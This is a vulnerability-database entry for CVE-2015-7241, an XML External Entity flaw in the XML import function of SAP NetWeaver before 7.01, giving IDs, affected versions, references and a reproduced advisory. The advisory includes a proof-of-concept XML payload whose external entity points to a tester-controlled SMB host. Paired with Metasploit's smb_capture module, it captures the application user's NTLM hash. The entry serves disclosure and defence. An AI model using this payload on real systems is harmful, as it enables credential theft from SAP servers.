Details of VAR-E-201509-0134

ID

VAR-E-201509-0134

CVE

cve_id:

CVE-2015-7241

Trust: 2.4

sources: BID: 76809 // PACKETSTORM: 133627 // EXPLOIT-DB: 38261 // EDBNET: 59376

EDB ID

38261

TITLE

SAP NetWeaver < 7.01 - XML External Entity Injection - XML webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 38261

DESCRIPTION

SAP NetWeaver < 7.01 - XML External Entity Injection. CVE-2015-7241CVE-118691 . webapps exploit for XML platform

Trust: 0.6

sources: EXPLOIT-DB: 38261

AFFECTED PRODUCTS

vendor:	sap	model:	netweaver	scope:	lt	version:	7.01	Trust: 1.6
vendor:	sap	model:	netweaver xml external entity	scope:	-	version:	-	Trust: 0.5
vendor:	sap	model:	netwaver	scope:	eq	version:	7.0	Trust: 0.3
vendor:	sap	model:	netweaver	scope:	ne	version:	7.01	Trust: 0.3

sources: BID: 76809 // PACKETSTORM: 133627 // EXPLOIT-DB: 38261 // EDBNET: 59376

EXPLOIT

Title: SAP Netwaver - XML External Entity Injection
Author: Lukasz Miedzinski
GPG: Public key provided in attachment
Date: 29/10/2014
CVE: CVE-2015-7241

Affected software :
===================

SAP Netwear : <7.01

Vendor advisories (only for customers):
===================
External ID : 851975 2014
Title: XML External Entity vulnerability in SAP XML Parser
Security Note: 2098608
Advisory Plan Date: 12/5/2014
Delivery date of fix/Patch Day: 10/2/2014
CVSS Base Score: 5.5
CVSS Base Vector: AV:N/AC:L/AU:S/C:P/I:N/A:P

Description :
=============
XML External Entity Injection vulnerability has been found in the XML
parser in the System

Administration->XML Content and Actions -> Import section.

Vulnerabilities :
*****************

XML External Entity Injection :
======================

Example show how pentester is able to get NTLM hash of application's user.

Content of file (PoC) :

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "file:////Tester.IP/test"> %remote; %param1; ]>
<root/>

When pentester has metasploit smb_capture module run, then application
will contatc him and provide

NTLM hash of user.

Contact :
=========

Lukasz[dot]Miedzinski[at]gmail[dot]com

Trust: 1.0

sources: EXPLOIT-DB: 38261

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 38261

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 38261

TYPE

XML External Entity Injection

Trust: 1.6

sources: EXPLOIT-DB: 38261 // EDBNET: 59376

CREDITS

Lukasz Miedzinski

Trust: 0.6

sources: EXPLOIT-DB: 38261

EXTERNAL IDS

db:	NVD	id:	CVE-2015-7241	Trust: 2.4
db:	EXPLOIT-DB	id:	38261	Trust: 1.6
db:	EDBNET	id:	59376	Trust: 0.6
db:	PACKETSTORM	id:	133627	Trust: 0.5
db:	BID	id:	76809	Trust: 0.3

sources: BID: 76809 // PACKETSTORM: 133627 // EXPLOIT-DB: 38261 // EDBNET: 59376

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2015-7241	Trust: 2.1
url:	https://www.exploit-db.com/exploits/38261/	Trust: 0.6
url:	https://help.sap.com/nw_platform	Trust: 0.3
url:	https://service.sap.com/sap/support/notes/https://service.sap.com/sap/support/notes/2098608	Trust: 0.3
url:	http://seclists.org/bugtraq/2015/sep/85	Trust: 0.3

sources: BID: 76809 // PACKETSTORM: 133627 // EXPLOIT-DB: 38261 // EDBNET: 59376

SOURCES

db:	BID	id:	76809
db:	PACKETSTORM	id:	133627
db:	EXPLOIT-DB	id:	38261
db:	EDBNET	id:	59376

LAST UPDATE DATE

2022-07-27T09:42:37.164000+00:00

SOURCES UPDATE DATE

db:

BID

id:

76809

date:

2015-09-21T00:00:00

SOURCES RELEASE DATE

db:	BID	id:	76809	date:	2015-09-21T00:00:00
db:	PACKETSTORM	id:	133627	date:	2015-09-21T12:11:11
db:	EXPLOIT-DB	id:	38261	date:	2015-09-22T00:00:00
db:	EDBNET	id:	59376	date:	2015-09-22T00:00:00

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE